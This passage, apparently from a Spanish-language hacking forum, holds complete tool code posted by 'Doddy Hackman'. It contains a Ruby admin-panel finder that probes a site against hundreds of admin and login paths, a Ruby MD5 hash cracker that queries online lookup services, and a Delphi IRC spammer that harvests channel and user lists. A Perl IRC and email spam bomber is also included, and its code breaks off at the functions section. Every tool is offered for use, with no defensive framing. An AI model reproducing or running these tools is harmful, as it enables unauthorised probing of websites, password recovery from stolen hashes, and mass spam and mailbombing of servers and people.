hp','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
print "\n[+] Scanning ...\n\n"
control = "0"
panels.each do |panel|
begin
url = page+"/"+panel
status_code = response_code(url)
if status_code=="200"
print "[+] Link : "+url+"\n"
control = "1"
end
end
end
if control=="1"
print "\n[+] Finished\n"
else
print "\n[-] Not Found\n"
end
end

def uso
print "\n[+] Sintax : ruby panel_finder.rb <page>\n"
end

def  head
print "\n\n-- ==  Panel Finder 0.5 == --\n\n"
end

def copyright
print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
end

page = ARGV[0]

head()

if !page
uso()
else
find_panel(page)
end

copyright()

#The End ?


Version Tk :

Código (ruby) [Seleccionar] Expandir


#!usr/bin/ruby
#PanelFinder 0.5
#(C) Doddy Hackman 2015

require "tk"
require "open-uri"
require "net/http"

# Functions

def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end

def response_code(web)
begin
return Net::HTTP.get_response(URI(web)) .code
rescue
return "404"
end
end

def tomar(web,arg)
begin
headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
uri = URI(web)
http = Net::HTTP.new(uri.host, uri.port)
return http.post(uri.path,arg, headers).body
rescue
return "Error"
end
end

#

window = TkRoot.new { title "PanelFinder 0.5 (C) Doddy Hackman 2015" ; background "black" }
window['geometry'] = '300x300-20+10'

TkLabel.new(window) do
background "black"
foreground "orange"
text "     Page : "
place('relx'=>"0.1",'rely'=>"0.1")
end

page = TkEntry.new(window){
background "black"
foreground "orange"
width 25
place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
background "black"
foreground "orange"
text "Console"
place('relx'=>0.4,'rely'=>0.2)
end

console =TkText.new(window) do
background "black"
foreground "orange"
width 30
height 10
place('relx'=>0.1,'rely'=>0.3)
end

TkButton.new(window) do
text "Search"
    background "black"
foreground "orange"
width 17
activebackground "orange"
highlightbackground  "orange"
command proc{

page = page.value.to_s
panels = ['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
console.insert("end", "[+] Scanning ...\n\n")
control = "0"
panels.each do |panel|
begin
url = page+"/"+panel
status_code = response_code(url)
if status_code=="200"
console.insert("end","[+] Link : "+url+"\n")
control = "1"
end
end
end
if control=="1"
console.insert("end","\n[+] Finished")
else
console.insert("end","\n[-] Not Found")
end

}
place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?


Una imagen :



Eso es todo.

Un simple script en Ruby para crackear un hash MD5.

Version consola :

Código (ruby) [Seleccionar] Expandir


#!usr/bin/ruby
#MD5 Cracker 0.2
#(C) Doddy Hackman 2015

require "open-uri"
require "net/http" 

# Functions

def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end

def response_code(web)
begin
return Net::HTTP.get_response(URI(web)) .code
rescue
return "404"
end
end

def tomar(web,arg)
begin
headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
uri = URI(web)
http = Net::HTTP.new(uri.host, uri.port)
return http.post(uri.path,arg, headers).body
rescue
return "Error"
end
end

def crack(md5)

print "\n[+] Cracking ...\n\n"

code = tomar("http://md5online.net/index.php","pass="+md5+"&option=hash2text&send=Submit")

if code=~/pass : <b>(.*?)<\/b>/
password = $1
print "[+] md5online.net -> "+password+"\n"
else
print "[-] md5online.net -> Not Found" + "\n"
end

code = tomar("http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php","md5="+md5)

if code=~/<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>/
password = $1
print "[+] md5.my-addr.co -> "+password+"\n"
else
print "[-] md5.my-addr.co -> Not Found" +"\n"
end

code = tomar("http://md5decryption.com/index.php","hash="+md5+"&submit=Decrypt It!")

if code=~/Decrypted Text: <\/b>(.*?)<\/font>/
password = $1
print "[+] md5decryption.com -> "+password+"\n"
else
print "[-] md5decryption.com -> Not Found"+"\n"
end

print "\n[+] Finished"

end

def uso
print "\n[+] Sintax : ruby md5cracker.rb <md5>\n"
end

def  head
print "\n\n-- == MD5 Cracker 0.2 == --\n\n"
end

def copyright
print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
end

#

md5 = ARGV[0]

head()

if !md5
uso()
else
crack(md5)
end

copyright()

#The End ?


Version Tk :

Código (ruby) [Seleccionar] Expandir


#!usr/bin/ruby
#MD5 Cracker 0.2
#(C) Doddy Hackman 2015

require "tk"
require "open-uri"
require "net/http"

#Functions

# Functions

def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end

def response_code(web)
begin
return Net::HTTP.get_response(URI(web)) .code
rescue
return "404"
end
end

def tomar(web,arg)
begin
headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
uri = URI(web)
http = Net::HTTP.new(uri.host, uri.port)
return http.post(uri.path,arg, headers).body
rescue
return "Error"
end
end

#

window = TkRoot.new { title "MD5 Cracker 0.2 (C) Doddy Hackman 2015" ; background "black" }
window['geometry'] = '300x300-20+10'

TkLabel.new(window) do
background "black"
foreground "green"
text "     MD5 : "
place('relx'=>"0.1",'rely'=>"0.1")
end

md5 = TkEntry.new(window){
background "black"
foreground "green"
width 25
place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
background "black"
foreground "green"
text "Console"
place('relx'=>0.4,'rely'=>0.2)
end

console =TkText.new(window) do
background "black"
foreground "green"
width 30
height 10
place('relx'=>0.1,'rely'=>0.3)
end

TkButton.new(window) do
text "Crack It"
        background "black"
foreground "green"
width 17
activebackground "green"
highlightbackground  "green"
command proc{
md5 = md5.value.to_s

console.insert("end","[+] Cracking ...\n\n")

code = tomar("http://md5online.net/index.php","pass="+md5+"&option=hash2text&send=Submit")
if code=~/pass : <b>(.*?)<\/b>/
password = $1
console.insert("end","[+] md5online.net -> "+password+"\n"  )
else
console.insert("end","[-] md5online.net -> Not Found" + "\n" )
end

code = tomar("http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php","md5="+md5)

if code=~/<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>/
password = $1
console.insert("end","[+] md5.my-addr.co -> "+password+"\n")
else
console.insert("end","[-] md5.my-addr.co -> Not Found" +"\n")
end

code = tomar("http://md5decryption.com/index.php","hash="+md5+"&submit=Decrypt It!")

if code=~/Decrypted Text: <\/b>(.*?)<\/font>/
password = $1
console.insert("end","[+] md5decryption.com -> "+password+"\n")
else
console.insert("end","[-] md5decryption.com -> Not Found"+"\n")
        end

console.insert("end","\n[+] Finished\n" )

}
place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?


Una imagen :



Eso es todo.

Un simple programa para hacer spam en canales IRC , tambien puede listar canales y usuarios.

Es algo inestable les recomiendo la version en Perl.

Una imagen :

Código (delphi) [Seleccionar] Expandir


// KingSpam 0.4
// (C) Doddy Hackman 2015

unit spam;

interface

uses
  Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants,
  System.Classes, Vcl.Graphics,
  Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.ComCtrls, Vcl.StdCtrls,
  Vcl.Imaging.pngimage, Vcl.ExtCtrls, IdContext, IdBaseComponent, IdComponent,
  IdTCPConnection, IdTCPClient, IdCmdTCPClient, IdIRC, PerlRegEx, Vcl.Menus,
  ShellApi;

type
  TForm1 = class(TForm)
    PageControl1: TPageControl;
    TabSheet1: TTabSheet;
    GroupBox1: TGroupBox;
    Label1: TLabel;
    host: TEdit;
    Label2: TLabel;
    port: TEdit;
    Label3: TLabel;
    nombre: TEdit;
    Label4: TLabel;
    canal: TEdit;
    Label5: TLabel;
    spam: TEdit;
    Button1: TButton;
    Button2: TButton;
    Button3: TButton;
    TabSheet2: TTabSheet;
    GroupBox2: TGroupBox;
    GroupBox3: TGroupBox;
    canales: TListBox;
    users: TListBox;
    TabSheet3: TTabSheet;
    GroupBox4: TGroupBox;
    GroupBox5: TGroupBox;
    lista_canales: TListBox;
    console1: TMemo;
    Label6: TLabel;
    canal_agregar: TEdit;
    Button4: TButton;
    Button5: TButton;
    TabSheet5: TTabSheet;
    GroupBox8: TGroupBox;
    console2: TMemo;
    IdIRC1: TIdIRC;
    Button9: TButton;
    StatusBar1: TStatusBar;
    GroupBox6: TGroupBox;
    canal_spam_usuarios: TEdit;
    TabSheet4: TTabSheet;
    GroupBox7: TGroupBox;
    Image2: TImage;
    Label7: TLabel;
    PopupMenu1: TPopupMenu;
    L1: TMenuItem;
    R1: TMenuItem;
    OpenDialog1: TOpenDialog;
    file_spam: TListBox;
    spam_usuarios: TTimer;
    Button11: TButton;
    Button6: TButton;
    otrospamfile: TListBox;
    Image3: TImage;
    procedure Button2Click(Sender: TObject);
    procedure IdIRC1Raw(ASender: TIdContext; AIn: Boolean;
      const AMessage: string);

    procedure Button3Click(Sender: TObject);
    procedure Button4Click(Sender: TObject);
    procedure Button5Click(Sender: TObject);

    procedure Button1Click(Sender: TObject);
    procedure L1Click(Sender: TObject);
    procedure R1Click(Sender: TObject);
    procedure spam_usuariosTimer(Sender: TObject);
    procedure Button11Click(Sender: TObject);
    procedure Button6Click(Sender: TObject);
    procedure FormCreate(Sender: TObject);

  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;
  buscando_usuarios: string;
  buscando_canales: string;
  control_guardar_canales: string;
  control_guardar_users: string;

implementation

{$R *.dfm}
// Functions

procedure savefile(filename, texto: string);
var
  ar: TextFile;

begin

  AssignFile(ar, filename);
  FileMode := fmOpenWrite;

  if FileExists(filename) then
    Append(ar)
  else
    Rewrite(ar);

  Write(ar, texto + sLineBreak);
  CloseFile(ar);

end;

procedure TForm1.Button11Click(Sender: TObject);
begin
  StatusBar1.Panels[0].Text := '[+] Finished';
  StatusBar1.Update;
  IdIRC1.Disconnect;
  spam_usuarios.Enabled := false;
end;

procedure TForm1.Button1Click(Sender: TObject);
var
  i: integer;
  contenido: TStringList;
  stream: TFileStream;
begin

  file_spam.Clear;

  if OpenDialog1.Execute then
  begin

    spam.Text := OpenDialog1.filename;

    contenido := TStringList.Create;
    stream := TFileStream.Create((OpenDialog1.filename), fmShareDenyNone);
    contenido.LoadFromStream(stream);

    for i := 0 to contenido.Count - 1 do
    begin
      file_spam.Items.Add(contenido[i]);
    end;
  end;

end;

procedure TForm1.Button2Click(Sender: TObject);
var
  seleccion: integer;
begin

  canales.Items.Clear;

  buscando_canales := 'yes';

  seleccion := MessageDlg('Save Channels', mtInformation, mbYesNo, 0);
  if seleccion = mrYes then
  begin
    control_guardar_canales := 'yes';
  end;

  StatusBar1.Panels[0].Text := '[+] Searching channels ...';
  StatusBar1.Update;

  // IdIRC1.Disconnect;

  IdIRC1.Nickname := nombre.Text;
  IdIRC1.AltNickname := nombre.Text + '123';
  IdIRC1.Username := nombre.Text;
  IdIRC1.RealName := nombre.Text;
  IdIRC1.Password := '';
  IdIRC1.host := host.Text;

  try
    begin
      IdIRC1.Connect;
      IdIRC1.Raw('LIST');
    end;
  except
    begin
      ShowMessage('Error connecting');
    end;
  end;

  if (FileExists(GetCurrentDir + '/logs/' + host.Text + '_canales.txt')) then
  begin
    ShellExecute(Handle, 'open', Pchar(GetCurrentDir + '/logs/' + host.Text +
      '_canales.txt'), nil, nil, SW_SHOWNORMAL);
  end;

end;

procedure TForm1.Button3Click(Sender: TObject);
var
  seleccion: integer;
begin

  users.Items.Clear;

  buscando_usuarios := 'yes';

  seleccion := MessageDlg('Save users', mtInformation, mbYesNo, 0);
  if seleccion = mrYes then
  begin
    control_guardar_users := 'yes';
  end;

  StatusBar1.Panels[0].Text := '[+] Searching users ...';
  StatusBar1.Update;

  // IdIRC1.Disconnect;

  IdIRC1.Nickname := nombre.Text;
  IdIRC1.AltNickname := nombre.Text + '123';
  IdIRC1.Username := nombre.Text;
  IdIRC1.RealName := nombre.Text;
  IdIRC1.Password := '';
  IdIRC1.host := host.Text;

  try
    begin
      IdIRC1.Connect;
      IdIRC1.Join(canal.Text);
    end;
  except
    begin
      ShowMessage('Error connecting');
    end;
  end;

  if (FileExists(GetCurrentDir + '/logs/' + canal.Text + '_usuarios.txt')) then
  begin
    ShellExecute(Handle, 'open', Pchar(GetCurrentDir + '/logs/' + canal.Text +
      '_usuarios.txt'), nil, nil, SW_SHOWNORMAL);
  end;

end;

procedure TForm1.Button4Click(Sender: TObject);
begin
  lista_canales.Items.Add(canal_agregar.Text);
end;

procedure TForm1.Button5Click(Sender: TObject);
var
  i: integer;
  canal_z: string;
begin

  StatusBar1.Panels[0].Text := '[+] Spamming channel ...';
  StatusBar1.Update;

  console1.Clear;
  try
    begin
      IdIRC1.Nickname := nombre.Text;
      IdIRC1.AltNickname := nombre.Text + '123';
      IdIRC1.Username := nombre.Text;
      IdIRC1.RealName := nombre.Text;
      IdIRC1.Password := '';
      IdIRC1.host := host.Text;
      IdIRC1.Connect;

      for i := 0 to lista_canales.Count - 1 do
      begin
        canal_z := lista_canales.Items[i];
        IdIRC1.Join(canal_z);
        console1.Lines.Add('[+] Spam in channel : ' + canal_z);
        IdIRC1.Say(canal_z, file_spam.Items[Random(file_spam.Count - 1) + 0]);
        Sleep(2000);
        IdIRC1.Part(canal_z);
        Sleep(2000);
      end;
    end;
  except
    ShowMessage('Error connecting');
  end;

  IdIRC1.Disconnect;

  StatusBar1.Panels[0].Text := '[+] Finished';
  StatusBar1.Update;

end;

procedure TForm1.Button6Click(Sender: TObject);
begin
  StatusBar1.Panels[0].Text := '[+] Spamming users ...';
  StatusBar1.Update;

  IdIRC1.Nickname := nombre.Text;
  IdIRC1.AltNickname := nombre.Text + '123';
  IdIRC1.Username := nombre.Text;
  IdIRC1.RealName := nombre.Text;
  IdIRC1.Password := '';
  IdIRC1.host := host.Text;

  try
    begin
      IdIRC1.Connect;
      IdIRC1.Join(canal_spam_usuarios.Text);
      spam_usuarios.Interval := 10000;
      spam_usuarios.Enabled := true;
    end;
  except
    begin
      ShowMessage('Error connecting');
    end;
  end;
end;

procedure TForm1.FormCreate(Sender: TObject);
begin

  if not DirectoryExists('logs') then
  begin
    CreateDir('logs');
  end;

  OpenDialog1.InitialDir := GetCurrentDir;

end;

procedure TForm1.IdIRC1Raw(ASender: TIdContext; AIn: Boolean;
  const AMessage: string);
var
  code: string;
  regex: TPerlRegEx;
  otroregex: TPerlRegEx;
  canales_encontrados: string;
  control: TPerlRegEx;
  otrocontrol: TPerlRegEx;
  i: integer;
  i2: integer;
  renicks: string;
  listanow: TStringList;
  arraynow: array of String;

begin
  code := AMessage;

  regex := TPerlRegEx.Create();
  otroregex := TPerlRegEx.Create();

  // console1.Lines.Add(code);

  regex.regex := '322 (.*?) (.*?) (.*?) :';
  regex.Subject := code;

  if regex.Match then
  begin
    canales_encontrados := regex.Groups[2];
    canales.Items.Add(canales_encontrados);
    if (control_guardar_canales = 'yes') then
    begin
      savefile('logs/' + host.Text + '_canales.txt', canales_encontrados);
    end;
  end;

  otroregex.regex := '353 (.*) = #(.*) :(.*)';
  otroregex.Subject := code;

  if otroregex.Match then
  begin

    renicks := otroregex.Groups[3];

    renicks := StringReplace(renicks, nombre.Text, '', []);

    listanow := TStringList.Create;
    listanow.Delimiter := ' ';
    listanow.DelimitedText := renicks;

    for i2 := 0 to listanow.Count - 1 do
    begin
      users.Items.Add(listanow[i2]);
      if (control_guardar_users = 'yes') then
      begin
        savefile('logs/' + canal.Text + '_usuarios.txt', listanow[i2]);
      end;
    end;
  end;

  control := TPerlRegEx.Create();
  control.regex := 'End of /LIST';
  control.Subject := code;
  if control.Match then
  begin
    if (buscando_canales = 'yes') then
    begin
      ShowMessage('Channels Loaded');
      StatusBar1.Panels[0].Text := '[+] Channels Found';
      StatusBar1.Update;
      regex.Free;
      IdIRC1.Disconnect;
      IdIRC1.Destroy;
      buscando_canales := 'no';
    end;
  end;

  otrocontrol := TPerlRegEx.Create();
  otrocontrol.regex := 'End of /NAMES';
  otrocontrol.Subject := code;
  if otrocontrol.Match then
  begin
    if (buscando_usuarios = 'yes') then
    begin
      ShowMessage('Users Loaded');
      StatusBar1.Panels[0].Text := '[+] Users Found';
      StatusBar1.Update;
      otrocontrol.Free;
      IdIRC1.Part(canal.Text);
      IdIRC1.Disconnect;
      IdIRC1.Destroy();
      buscando_usuarios := 'no';
    end;
  end;

end;

procedure TForm1.L1Click(Sender: TObject);
var
  i: integer;
  contenido: TStringList;
  stream: TFileStream;
begin

  if OpenDialog1.Execute then
  begin
    contenido := TStringList.Create;
    stream := TFileStream.Create((OpenDialog1.filename), fmShareDenyNone);
    contenido.LoadFromStream(stream);

    for i := 0 to contenido.Count - 1 do
    begin
      lista_canales.Items.Add(contenido[i]);
    end;
  end;

end;

procedure TForm1.R1Click(Sender: TObject);
begin
  lista_canales.Clear;
end;

procedure TForm1.spam_usuariosTimer(Sender: TObject);
var
  i: integer;
begin

  for i := 0 to users.Count - 1 do
  begin

    StatusBar1.Panels[0].Text := '[+] Spamming to ' + users.Items[i];
    StatusBar1.Update;

    console2.Lines.Add('[+] Spamming to ' + users.Items[i]);

    IdIRC1.Say(users.Items[i],
      file_spam.Items[Random(file_spam.Count - 1) + 0]);

  end;

end;

end.

// The End ?


Si lo quieren bajar lo pueden hacer de aca

Un simple script en Perl para hacer spam en canales IRC y correos.

Tiene las siguientes opciones :

• Spammear un canal normalmente o por siempre
  
• Spammear un servidor entero
  
• Spammear una lista de servidores y todos sus canales
  
• Poder elegir un nick para el bot y un timeout
  
• Permite spammear cuentas de correo
  
  El codigo :
  
  
  Código (perl) [Seleccionar] Expandir
  
#!usr/bin/perl
#King Spam 1.0
#(C) Doddy Hackman 2015
# SMTP Servers
#smtp.gmail.com - 465
#smtp.mail.yahoo.com -587

use IO::Socket;
use Color::Output;
Color::Output::Init;
use Getopt::Long;

#use Win32::OLE;

my $nick_secundario    = "Cl4ptr4p";
my $timeout_secundario = "5";

GetOptions(
    "get_channels=s"         => \$get_channels,
    "get_users=s"            => \$get_users,
    "spam_channel=s"         => \$spam_channel,
    "spam_channel_forever=s" => \$spam_channel_forever,
    "spam_server=s"          => \$spam_server,
    "spam_servers_file=s"    => \$spam_servers_file,
    "spam_targets=s"         => \$spam_targets,
    "spam_file=s"            => \$spam_file,
    "channel=s"              => \$channel,
    "port=s"                 => \$port,
    "nick=s"                 => \$nick,
    "savefile=s"             => \$file,
    "timeout=s"              => \$timeout,
    "mailbomber"             => \$mailbomber
);

head();

if ($get_channels) {

    my $port_now = "";
    my $nick_now = "";
    my $file_now = "";

    if ( !$port ) {
        $port_now = "6667";
    }
    else {
        $port_now = $port;
    }

    if ( !$nick ) {
        $nick_now = $nick_secundario;
    }
    else {
        $nick_now = $nick;
    }

    if ( !$file ) {
        $file_now = "";
    }
    else {
        $file_now = $file;
    }

    listar_canales( $get_channels, $port_now, $nick_now, $file_now );

}
elsif ($get_users) {

    my $port_now = "";
    my $nick_now = "";
    my $file_now = "";

    if ( !$port ) {
        $port_now = "6667";
    }
    else {
        $port_now = $port;
    }

    if ( !$nick ) {
        $nick_now = $nick_secundario;
    }
    else {
        $nick_now = $nick;
    }

    printear_titulo("[+] Serching users ...\n\n");

    my @usuarios =
      buscar_usuarios( $get_users, $port_now, $nick_now, $channel );

    if ( int(@usuarios) eq "0" ) {
        printear("[-] Users not found\n");
    }
    else {
        printear("[+] Users Found : ");
        print int(@usuarios) . "\n\n";
        for my $usuario (@usuarios) {
            printear("[+] User : ");
            print $usuario. "\n";
            savefile( $file, $usuario );
        }
    }

}
elsif ($spam_channel) {

    my $port_now    = "";
    my $nick_now    = "";
    my $timeout_now = "";

    if ( !$port ) {
        $port_now = "6667";
    }
    else {
        $port_now = $port;
    }

    if ( !$nick ) {
        $nick_now = $nick_secundario;
    }
    else {
        $nick_now = $nick;
    }

    if ( !$timeout ) {
        $timeout_now = $timeout_secundario;
    }
    else {
        $timeout_now = $timeout;
    }

    spam_canal(
        $spam_channel, $port_now,  $nick_now,
        $channel,      $spam_file, $timeout_now
    );

}
elsif ($spam_channel_forever) {

    my $port_now    = "";
    my $nick_now    = "";
    my $timeout_now = "";

    if ( !$port ) {
        $port_now = "6667";
    }
    else {
        $port_now = $port;
    }

    if ( !$nick ) {
        $nick_now = $nick_secundario;
    }
    else {
        $nick_now = $nick;
    }

    if ( !$timeout ) {
        $timeout_now = $timeout_secundario;
    }
    else {
        $timeout_now = $timeout;
    }

    spam_canal_forever( $spam_channel_forever, $port_now, $nick_now,
        $channel, $spam_file, $timeout_now );

}
elsif ($spam_server) {

    my $port_now    = "";
    my $nick_now    = "";
    my $timeout_now = "";

    if ( !$port ) {
        $port_now = "6667";
    }
    else {
        $port_now = $port;
    }

    if ( !$nick ) {
        $nick_now = $nick_secundario;
    }
    else {
        $nick_now = $nick;
    }

    if ( !$timeout ) {
        $timeout_now = $timeout_secundario;
    }
    else {
        $timeout_now = $timeout;
    }

    my @encontrados = buscar_canales( $spam_server, $port_now, $nick_now );

    for my $encontrado (@encontrados) {
        if ( $encontrado =~ /(.*)-soy_un_limite-(.*)/ ) {
            my $canal    = $1;
            my $cantidad = $2;

            spam_canal( $spam_server, $port_now, $nick_now, $canal, $spam_file,
                $timeout_now );

        }
    }

}
elsif ($spam_servers_file) {

    my $port_now    = "";
    my $nick_now    = "";
    my $timeout_now = "";

    if ( !$port ) {
        $port_now = "6667";
    }
    else {
        $port_now = $port;
    }

    if ( !$nick ) {
        $nick_now = $nick_secundario;
    }
    else {
        $nick_now = $nick;
    }

    if ( !$timeout ) {
        $timeout_now = $timeout_secundario;
    }
    else {
        $timeout_now = $timeout;
    }

    unless ( -f $spam_servers_file ) {
        printear("[-] File not found\n\n");
        copyright();
    }
    else {

        my @lista = loadfile($spam_servers_file);

        printear("[+] Servers Found : ");
        print int(@lista) . "\n";

        printear_titulo(
            "\n-------------------------------------------------------------\n"
        );

        for my $spam_server (@lista) {
            chomp $spam_server;
            my @encontrados =
              buscar_canales( $spam_server, $port_now, $nick_now );

            for my $encontrado (@encontrados) {
                chomp $encontrado;
                if ( $encontrado =~ /(.*)-soy_un_limite-(.*)/ ) {
                    my $canal    = $1;
                    my $cantidad = $2;

                    spam_canal( $spam_server, $port_now, $nick_now, $canal,
                        $spam_file, $timeout_now );
                    printear_titulo(
"\n-------------------------------------------------------------\n"
                    );
                }
            }
        }
    }

}
elsif ($spam_targets) {

    my $port_now    = "";
    my $nick_now    = "";
    my $timeout_now = "";

    if ( !$port ) {
        $port_now = "6667";
    }
    else {
        $port_now = $port;
    }

    if ( !$nick ) {
        $nick_now = $nick_secundario;
    }
    else {
        $nick_now = $nick;
    }

    if ( !$timeout ) {
        $timeout_now = $timeout_secundario;
    }
    else {
        $timeout_now = $timeout;
    }

    if ( -f $spam_targets ) {

        my @datos = loadfile($spam_targets);

        printear("[+] Servers Found : ");
        print int(@datos) . "\n";

        printear_titulo(
            "\n-------------------------------------------------------------\n"
        );

        for my $dato (@datos) {
            chomp $dato;
            if ( $dato =~ /(.*) --- (.*)/ ) {
                my $server = $1;
                my $canal  = $2;

                spam_canal( $server, $port_now, $nick_now, $canal, $spam_file,
                    $timeout_now );
                printear_titulo(
"\n-------------------------------------------------------------\n"
                );

            }
        }

    }
    else {
        printear("\n[-] File not Found\n\n");
        copyright();
    }

}
elsif ($mailbomber) {

    printear_titulo("[+] Spam Mails : OK\n\n\n");

    printear("[+] Host : ");
    chomp( my $host = <stdin> );

    printear("\n[+] Port : ");
    chomp( my $puerto = <stdin> );

    printear("\n[+] Username : ");
    chomp( my $username = <stdin> );

    printear("\n[+] Password : ");
    chomp( my $password = <stdin> );

    printear("\n[+] Count Message : ");
    chomp( my $count = <stdin> );

    printear("\n[+] To : ");
    chomp( my $to = <stdin> );

    printear("\n[+] Subject : ");
    chomp( my $asunto = <stdin> );

    printear("\n[+] Body : ");
    chomp( my $body = <stdin> );

    printear("\n[+] File to Send : ");
    chomp( my $file = <stdin> );

    printear_titulo("\n[+] Starting ...\n\n");

    for my $num ( 1 .. $count ) {
        printear("[+] Sending Message : ");
        print "$num\n";
        sendmail(
            $host,     $puerto, $username, $password, $username, $username,
            $username, $to,     $asunto,   $body,     $file
        );
    }

    printear_titulo("\n[+] Finished\n");

}
else {
    sintax();
}

copyright();

# Functions

